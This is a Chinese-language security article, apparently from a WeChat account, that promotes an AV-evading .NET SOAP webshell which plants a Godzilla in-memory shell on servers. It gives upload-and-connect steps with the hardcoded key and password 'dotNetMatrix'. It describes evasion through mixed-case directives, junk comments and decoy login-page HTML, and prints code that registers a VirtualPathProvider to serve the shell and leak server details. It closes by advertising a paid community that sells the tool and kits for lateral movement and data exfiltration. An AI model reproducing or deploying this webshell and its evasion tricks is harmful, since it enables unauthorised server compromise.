01
阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02
基本介绍
Sharp4SoapGodzlliav1.1.soap是一款增强免杀的 SoapShell,支持在服务器上植入哥斯拉内存马,这款工具不仅可以灵活地运行在服务器的根目录或子目录下,还通过多种技术手段提高了 Bypass能力,为后续的信息搜集和渗透攻击提供了重要支持。
03
使用方法
将 Sharp4SoapGodzlliav1.1.soap 文件上传到服务器的目标目录,上传文件成功后可以自动植入支持哥斯拉的内存马,具体的访问路径会以响应信息的形式返回,供用户参考。通常情况下,内存马的访问路径会如以下示例所示
uploadfiles/dotNetMatrix/Godzllia1.1.aspx
成功植入内存马后,Sharp4SoapGodzlliav1.1 将会返回详细的服务器环境信息,便于攻击者进一步分析。这些信息包括内存马具体的访问路径、网站当前的绝对路径、.NET Framework版本以及Windows操作系统版本等
要使用“哥斯拉”客户端与服务器上的 Sharp4SoapGodzllia v1.1 内存马进行交互,需要将密钥和密码均设置为 dotNetMatrix,这样客户端即可顺利连接到目标服务器上的内存马,并执行各种命令和操作。
04
原理解析
以下是Sharp4SoapGodzllia v1.1的一部分代码,利用HTML和JavaScript以及Unicode编码进行隐蔽操作:
随后,通过使用注释和不可见字符,Sharp4SoapGodzllia v1.1 能够有效地规避安全软件的查杀和拦截。<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title></title>
<link href="favorate.ico?ver=286.7" rel="shortcut icon" type="image/x-icon" />
<!--<script src="Content/Script/cloud.js" type="text/javascript"></script>-->
<style>
.icon {
position: relative;
}
.icon_one, .icon_two {
position: absolute;
top: 25%;
left: 58px;
color: #7f8499;
}
</style>
</head>
<script type="text/javascript">
$(function () {
$('.loginbox').fadeIn();
if (document.getElementById("User").value == "") {
document.getElementById("User").focus();
} else {
document.getElementById("User").focus();
}
});
</script>
<%@ PAge LaNgUagE=cs%>
<%/*UoWa*//*UoWa*/try/*UoWa*/{/*UoWa*//*UoWa*/%>
<!--<body style="background-color: #1c77ac; background-image: url('Content/img.png'); background-repeat: no-repeat; background-position: center top; overflow: hidden;">-->
接着,通过base64编码和RegisterVirtualPathProvider方法实现哥斯拉内存马注入,具体代码如下所示。
SamplePathProvider sampleProvider = new SamplePathProvider(targetVirtualPath, webshellContent);
System.Web.Hosting.HostingEnvironment.RegisterVirtualPathProvider(sampleProvider);
System.Web.HttpContext.Current.Response.Write("<pre style='text-align: center;font-weight: Bold;'> Soap Memory Shell For Godzllia </pre>");
System.Web.HttpContext.Current.Response.Write("<pre>");
System.Web.HttpContext.Current.Response.Write("1. Memory Shell Path: " + targetVirtualPath + "Godzllia1.1.aspx rn");
System.Web.HttpContext.Current.Response.Write("2. WebSite Application Path: " + System.Web.HttpContext.Current.Server.MapPath(System.Web.HttpContext.Current.Request.ApplicationPath) + "rn");
System.Web.HttpContext.Current.Response.Write("3. dotNet FrameWork Version: " + System.Environment.Version + "rn" );
System.Web.HttpContext.Current.Response.Write("4. Windows OSVersion: " + System.Environment.OSVersion + "rn" );
System.Web.HttpContext.Current.Response.Write("5. Just for Research, Do Not Abuse It! Author: dotNet Security Matrix Team rn" );
System.Web.HttpContext.Current.Response.Write("</pre>");
System.Web.HttpContext.Current.Response.End();
综上,Sharp4SoapGodzllia v1.1 作为增强免杀的 Webshell 工具,不仅能在服务器上植入内存马,还可以返回详细的服务器环境信息。工具已经打包在星球,感兴趣的朋友可以加入自取。
05
推荐阅读
从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!
06
欢迎加入.NET安全星球
为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。 星球门票后期价格随着内容和质量的不断沉淀会适当提高,因此越早加入越好!
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。
为了助力大家在2024国家级hvv演练中脱颖而出,我们特别整理出了一套涵盖dotNet安全矩阵星球的八大.NET相关方向工具集。
.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输
这些阶段所涉及的工具集不仅代表了当前.NET安全领域的最前沿技术,更是每一位网络安全爱好者不可或缺的实战利器。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...